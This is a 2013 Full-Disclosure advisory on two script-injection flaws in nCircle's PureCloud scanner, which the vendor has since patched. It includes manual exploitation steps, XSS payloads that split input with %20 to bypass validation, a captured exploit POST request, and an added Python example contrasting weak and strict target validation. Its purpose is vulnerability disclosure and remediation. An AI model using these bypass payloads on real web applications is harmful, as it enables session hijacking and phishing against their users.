List: full-disclosure
Subject: [Full-disclosure] nCircle PureCloud Vulnerability Scanner - Multiple Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-01-29 10:20:15
Message-ID: 5107A25F.3000209 () vulnerability-lab ! com
Title:
======
nCircle PureCloud Vulnerability Scanner - Multiple Vulnerabilities
Date:
=====
2013-01-28
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=795
nCircle Tracking ID: 20130117-US11337
VL-ID:
=====
795
Common Vulnerability Scoring System:
====================================
4.1
Introduction:
=============
nCircle PureCloud is brought to you by nCircle, the leading provider of information risk and security performance management solutions. PureCloud delivers an enterprise-class vulnerability scanner with more than double the coverage of other providers, covering thousands of conditions and prioritized risk assessments, all in a cloud-based solution.
nCircle PureCloud is the world's first security scanning technology that requires no scanning infrastructure on the customer network. PureCloud eliminates the need for firewall changes and software or hardware deployment on a customer's internal network. Requiring only a web browser, PureCloud securely scans a private network to identify a broad range of vulnerabilities and risks, and provides detailed guidance on the steps necessary to reduce or eliminate those risks. With PureCloud, small businesses and home offices benefit from nCircle's most advanced enterprise-class security scanning solution, without the complexity or maintenance associated with traditional SaaS or on-premise scanning products. PureCloud is delivered as a software service in the cloud, making it cost-effective, efficient and widely accessible.
(Copy of the Vendor Homepage: https://purecloud.ncircle.com/about_purecloud/ )
Abstract:
=========
The Vulnerability-Laboratory Research Team discovered two web vulnerabilities (a client-side POST injection in the exception handling and a persistent script injection in the scan index listing) in the nCircle PureCloud (cloud-based) Vulnerability Scanner Application.
Report-Timeline:
================
2012-12-24: Researcher Notification & Coordination
2012-12-25: Vendor Notification
2013-01-16: Vendor Response/Feedback
2013-01-28: Vendor Fix/Patch by nCircle Dev
2013-01-28: Public Disclosure
Status:
========
Published
Affected Products:
==================
nCircle
Product: PureCloud - Vulnerability Scanner (cloud-based) 2012 Q4
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
A persistent and client-side POST injection web vulnerability has been detected in the nCircle PureCloud (cloud-based) Vulnerability Scanner Application. This vulnerability type allows an attacker to inject their own malicious script code into the vulnerable module on the application side (persistent).
1.1
The first vulnerability is located in the Scan Now > Scan Type > Perimeter Scan > Scan section, in the `Scan Specific Devices - [Add Devices]` module, and is bound to the formErrorContent exception-handling parameter. The injected script code is executed from the `invalid networks` error message of the application's exception handling. To bypass the application's standard input validation, the attacker first has to provoke the specific `invalid networks` error. In a second step the attacker splits the request after the context matched by the invalid-input filter, so that the unparsed malicious script code following the split is executed. The vulnerability can be exploited on the client side, via a manipulated link sent as a malicious request with medium user interaction, and also on the server side, via POST injection in the later affected add-server listing module.
1.2
The second vulnerability is bound to the first issue and is located in the IP & Name output listing of the scan index, after a network/server/IP has been added. The code is executed from the main IP & name listing after a malicious entry has been injected via the add module. To bypass the IP restriction filter, the request has to be split, as in the first issue, with a valid IP: the remote attacker submits a valid IP followed by a split (%20) and their own script code, which passes the system validation filter and is then executed from the device name and IP listing.
The vulnerabilities can be exploited with a privileged application user account and low or medium user interaction. Successful exploitation results in persistent/non-persistent session hijacking, persistent/non-persistent phishing, external redirects, external malware loads and persistent/non-persistent manipulation of the vulnerable module context.
Vulnerable Service(s):
[+] nCircle PureCloud (cloud-based) Vulnerability Scanner \
[https://purecloud.ncircle.com/index/]
Vulnerable Section(s):
[+] Scan Now > Scan Type > Perimeter Scan > Scan
Vulnerable Module(s):
[+] Scan Specific Devices - [Add Devices]
[+] Scan IP (Index)
Vulnerable Parameter(s):
[+] formErrorContent
[+] ip & name
Affected Module(s):
[+] Exception Handling - Invalid Network(s)
[+] Scan Index - Listing
Proof of Concept:
=================
The client- and server-side web vulnerability can be exploited by remote attackers and by local privileged application user accounts with low or medium user interaction. For demonstration or reproduction:
1.1
Note:
When a standard iframe, img src, script or onload tag is injected directly, the context is parsed by the exception handling, which prevents execution on the first injection attempt. To bypass the validation, first inject a frame that matches the invalid-input filter so that the error is displayed, then split the request with %20 and inject the script code after the split via POST.
Manual Exploitation:
1. Register an account at nCircle PureCloud to get access to the (cloud-based) Vulnerability Scanner - [https://purecloud.ncircle.com/registerinfo3/?hacknewssocial]
2. Log in to your account, switch to the Scan Now menu and open the Scan Type page.
3. Choose the Perimeter Scan, not the local one!
4. Include a standard script alert tag to provoke the exception handling, split the request with %20' and inject your own frame onload script code. Save via Add!
5. The script code is executed from the exception handling's invalid networks message.
6. Done #1 ... Successfully reproduced! Press Continue to also exploit the listing :)
7. Include a valid IP, split the request (bypassing the input restriction) and inject your own script code after it.
8. Watch the scan index. The code is executed from the vulnerable name and IP value output listing.
9. Done #2 ... Successfully reproduced!
PoC:
#1 <iframe src=PROVOKEINVALIDEXCEPTION1> %20' >"<[OWN INJECTED PERSISTENT SCRIPT CODE!]>
#2 <script>alert("PROVOKEINVALIDEXCEPTION2")</script> < %20' "><[OWN INJECTED PERSISTENT SCRIPT CODE!]) <
Review: Scan Specific Devices > [Add Devices] - Exception Handling - Invalid Network(s)
<div style="opacity: 0.87; position: absolute; top: 287px; left: 461px; margin-top: -200px;"
class="id_add_hosts_textformError parentFormscan-form formError">
<div class="formErrorContent">
The following networks are invalid: %20"><"><script>alert(\"PROVOKEEXCEPTION\")> < %20' \
">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]> (host not found)</iframe></div><div \
class="formErrorArrow"><div class="line10"><!-- --></div><div class="line9"><!-- --></div> <div \
class="line8"><!-- --></div><div class="line7"><!-- --></div><div class="line6"><!-- \
--></div><div class="line5"><!-- --></div> <div class="line4"><!-- --></div><div \
class="line3"><!-- --></div><div class="line2"><!-- --></div><div class="line1"><!-- \
--></div></div></div> <input value="%20"><iframe src=[PROVOKE!]>%20 \
>"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]>" id="id_add_hosts_text" tabindex="5" \
> class="wizardInput" placeholder="Add Devices" type="text">
<button id="add_button" class="addButton">Add</button>
</div>
--- Manipulated POST Values ---
csrfmiddlewaretoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N
json_data={"connector":-1,"scan_connected_network":false,
"registration_id":"","scope_name":"","editing_scope_schedule":false,
"webapp":false,"targets":["><script>alert(\"PROVOKEEXCEPTION\")> < %20' \
">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]) <"]}
--- Manipulated POST Request ---
Status: 200[OK]
POST https://purecloud.ncircle.com/services/validate_targets/
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[181] Mime Type[application/json]
Request Header:
Host[purecloud.ncircle.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://purecloud.ncircle.com/index/]
Content-Length[439]
Cookie[csrftoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N;
sessionid=8c8624ba5e31c63bf24bcbf9af796743;
BIGipServerPICO-443to80=1875711404.20480.0000; utmcct=/ben37.root; \
wcsid=uNTCNCc0tpp1NCv01YCYlGfr93631472; hblid=kRw3BvqhoczGhyJc8E8J5dYW93631472;
_oklv=1356379996583%2CuNTCNCc0tpp1NCv01YCYlGfr93631472;
olfsk=olfsk02835150931791619;
_okbk=cd5%3Davailable%2Ccd4%3Dtrue%2Cwa1%3Dfalse%2Cvi5%3D0%2Cvi4%3D1356378355284%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8
%3Dchat%2Ccd6%3D0%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9363-144-10-3734; \
__unam=97cb67-13bce735458-18f208d4-21; \
_mkto_trk=id:671-RXE-353&token:_mch-ncircle.com-1356378363952-41877] Pragma[no-cache]
Cache-Control[no-cache]
POST Data:
csrfmiddlewaretoken[HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N]
json_data[%7B%22connector%22%3A-1%2C%22scan_connected_network%22%3Afalse%2C%22registration_id%22%3A%22%22%2C%22scope_name
%22%3A%22%22%2C%22editing_scope_schedule%22%3Afalse%2C%22webapp%22%3Afalse%2C%22targets%22%3A%5B%22%2520%5C%22+%2520+%5C%22%3E%3C
iframe+src%3Da+onload%3Dalert(%5C%22PROVOKEEXCEPtION%5C%22)+%3C++%5C%22%3E%3C[PERSISTENT/NON-PERSISTENT \
INJECTED SCRIPT CODE!])+%3C%22%5D%7D]
Response Header:
Date[Mon, 24 Dec 2012 20:13:25 GMT]
Server[Apache]
Content-Language[en]
Content-Encoding[gzip]
Vary[Accept-Language,Cookie,Accept-Encoding]
X-Frame-Options[SAMEORIGIN]
Content-Length[181]
Keep-Alive[timeout=15, max=76]
Connection[Keep-Alive]
Content-Type[application/json]
1.2
The server-side (persistent) web vulnerability can be exploited by remote attackers and by local privileged application user accounts with low user interaction. For demonstration or reproduction:
PoC:
[VALID IP]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...
[VALID NAME]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...
Solution:
=========
Parse the exception-handling error output and do not echo the rejected input back into the web context unencoded. To fix the vulnerability, validate the content of the input fields in the Add Devices module and restrict the input fields with a secure filter mask; since the current filter is bypassed by splitting the request after a valid IP, the whole submitted value has to be validated, not only the part before the split. Also encode the name & IP values in the scan index output listing and restrict what the requested web context of the scan listing may contain.
2013-01-28: Vendor Fix/Patch by nCircle Dev
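The following Python is an added illustration of the fix described above and of the bypass in 1.1 and 1.2; it is not nCircle's code and not part of the original advisory (Python is chosen because the csrfmiddlewaretoken field shows a Django back end). It contrasts a target validator that parses only the first whitespace-separated token, which is the behaviour the "valid ip + %20 + script code" bypass implies, with one that validates the entire submitted value and HTML-encodes whatever it echoes back, both in the invalid-networks error and in the scan index listing. All function names, the sample targets and the markup are hypothetical/constructed.

```python
# Added example (not nCircle's code): a target validator that checks only the
# first whitespace-separated token, next to one that validates the whole value
# and HTML-encodes whatever it echoes. All names here are hypothetical.
import html
import ipaddress
import re

# Constructed sample targets in the shape the advisory describes.
SAMPLE_TARGETS = [
    "192.0.2.10",                                   # clean entry
    "192.0.2.10 '><img src=x onerror=alert(1)>",    # valid IP + %20 split + payload (issue 1.2)
    "><script>alert('PROVOKEEXCEPTION')</script>",  # provokes the invalid-network error (issue 1.1)
]

# RFC 1123 hostname label pattern (assumption: hostnames are allowed targets).
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}", re.IGNORECASE)


def weak_is_valid_target(target):
    """Prefix-only check: only the first token is parsed, so the remainder of
    "<valid ip> <payload>" rides through untouched."""
    tokens = target.split()
    if not tokens:
        return False
    try:
        ipaddress.ip_network(tokens[0], strict=False)
        return True
    except ValueError:
        return False


def weak_error_html(rejected):
    """Echoes the rejected raw input straight into the formErrorContent div."""
    return ('<div class="formErrorContent">The following networks are invalid: '
            + ", ".join(rejected) + " (host not found)</div>")


def strict_is_valid_target(target):
    """Parse the entire string: no splitting, no surrounding whitespace, and
    only an IPv4/IPv6 address, a CIDR network or a hostname is accepted."""
    if not target or target != target.strip() or len(target) > 253:
        return False
    try:
        ipaddress.ip_network(target, strict=False)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.fullmatch(target) is not None


def safe_error_html(rejected):
    """Same message, but every rejected value is HTML-encoded before the echo."""
    return ('<div class="formErrorContent">The following networks are invalid: '
            + html.escape(", ".join(rejected), quote=True) + " (host not found)</div>")


def safe_listing_row(name, ip):
    """Scan-index row (issue 1.2): encode both stored values on output and
    refuse to render an IP value that no longer parses as a target."""
    if not strict_is_valid_target(ip):
        raise ValueError("stored target is not a valid address: %r" % ip)
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(name, quote=True), html.escape(ip, quote=True))


def validate_targets(targets, validator, renderer):
    """Loose stand-in for the /services/validate_targets/ step: returns the
    accepted targets and the error HTML for the rejected ones (or None)."""
    accepted = [t for t in targets if validator(t)]
    rejected = [t for t in targets if not validator(t)]
    return accepted, (renderer(rejected) if rejected else None)


if __name__ == "__main__":
    for label, validator, renderer in (
        ("weak", weak_is_valid_target, weak_error_html),
        ("strict", strict_is_valid_target, safe_error_html),
    ):
        accepted, error = validate_targets(SAMPLE_TARGETS, validator, renderer)
        print(label, "accepted:", accepted)
        print(label, "error:", error)
```

With the weak validator the second sample passes and its payload is stored for the listing, and the third sample is rejected but echoed raw into the error div; with the strict validator only the clean entry is accepted and the rejected values come back as entities, so neither the error message nor the listing row can carry markup.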
Risk:
=====
1.1
The security risk of the client- and server-side POST injection web vulnerability in the exception handling and listing is estimated as medium(+).
1.2
The security risk of the persistent input validation vulnerability in the scan index listing is estimated as medium(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get permission.
Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/